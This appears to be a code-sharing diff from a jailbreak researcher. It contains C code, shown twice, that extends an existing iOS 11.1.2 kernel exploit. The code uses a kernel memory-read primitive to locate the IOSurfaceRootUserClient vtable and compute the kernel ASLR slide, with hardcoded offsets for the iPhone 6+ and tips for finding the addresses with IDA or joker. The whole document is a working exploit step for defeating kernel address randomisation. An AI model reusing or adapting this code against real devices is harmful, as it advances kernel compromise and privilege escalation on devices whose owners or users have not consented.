ninjaprawn · December 12, 2017 12:49
diff --git a/slide.c b/slide.c
 /*
 Offsets from iOS 11.1.2 iPhone 6+
 Insert the following after line 680 in async_wait.c
 Mostly from Siguza's v0rtex
 */

 mach_ports_register(mach_task_self(), &user_client, 1);
 uint64_t IOSurfaceRootUserClient_port = rk64(task_addr + 0x2e8 + 0x8); // 0x2e8 = OFFSET_TASK_ITK_REGISTERED, second port in the list
 uint64_t IOSurfaceRootUserClient_addr = rk64(IOSurfaceRootUserClient_port + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));
 uint64_t IOSurfaceRootUserClient_vtab = rk64(IOSurfaceRootUserClient_addr);

 printf("IOSurfaceRootUserClient_vtab: %016llx\n", IOSurfaceRootUserClient_vtab);
 printf("IOSurfaceRootUserClient_vtab[0]: %016llx\n", rk64(IOSurfaceRootUserClient_vtab));
 printf("starting assembly of IOSurfaceRootUserClient_vtab[0]: %016llx\n", rk64(rk64(IOSurfaceRootUserClient_vtab)));

 // Use IDA to find the first occurance of the sequence of bytes from "starting assembly..." (on 6+ it is a9bf7bfd14000fe3 for IDA)
 // If you don't have IDA, use a hex editor to find the offset of "e30f0014fd7bbfa9", then use `joker -a <offset> kernel`, and use the address returned as the value (again, not sure if asm is the same across all kernels)
 // (I only use the first function of the vtable for the slide as it's pretty easy to find the location in the kernel, can use the vtable directly instead)
 #define FIRST_VTAB_LOCATION 0xfffffff0065e19e4

 uint64_t slide = rk64(IOSurfaceRootUserClient_vtab)-FIRST_VTAB_LOCATION;
 printf("slide is maybe %016llx\n", slide);
 printf("ooh? %08x\n", rk32(slide + 0xFFFFFFF007004000)); // Should be feedfacf
	/*
	Offsets from iOS 11.1.2 iPhone 6+
	Insert the following after line 680 in async_wait.c
	Mostly from Siguza's v0rtex
	*/

	mach_ports_register(mach_task_self(), &user_client, 1);
	uint64_t IOSurfaceRootUserClient_port = rk64(task_addr + 0x2e8 + 0x8); // 0x2e8 = OFFSET_TASK_ITK_REGISTERED, second port in the list
	uint64_t IOSurfaceRootUserClient_addr = rk64(IOSurfaceRootUserClient_port + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));
	uint64_t IOSurfaceRootUserClient_vtab = rk64(IOSurfaceRootUserClient_addr);

	printf("IOSurfaceRootUserClient_vtab: %016llx\n", IOSurfaceRootUserClient_vtab);
	printf("IOSurfaceRootUserClient_vtab[0]: %016llx\n", rk64(IOSurfaceRootUserClient_vtab));
	printf("starting assembly of IOSurfaceRootUserClient_vtab[0]: %016llx\n", rk64(rk64(IOSurfaceRootUserClient_vtab)));

	// Use IDA to find the first occurance of the sequence of bytes from "starting assembly..." (on 6+ it is a9bf7bfd14000fe3 for IDA)
	// If you don't have IDA, use a hex editor to find the offset of "e30f0014fd7bbfa9", then use `joker -a <offset> kernel`, and use the address returned as the value (again, not sure if asm is the same across all kernels)
	// (I only use the first function of the vtable for the slide as it's pretty easy to find the location in the kernel, can use the vtable directly instead)
	#define FIRST_VTAB_LOCATION 0xfffffff0065e19e4

	uint64_t slide = rk64(IOSurfaceRootUserClient_vtab)-FIRST_VTAB_LOCATION;
	printf("slide is maybe %016llx\n", slide);
	printf("ooh? %08x\n", rk32(slide + 0xFFFFFFF007004000)); // Should be feedfacf
No results found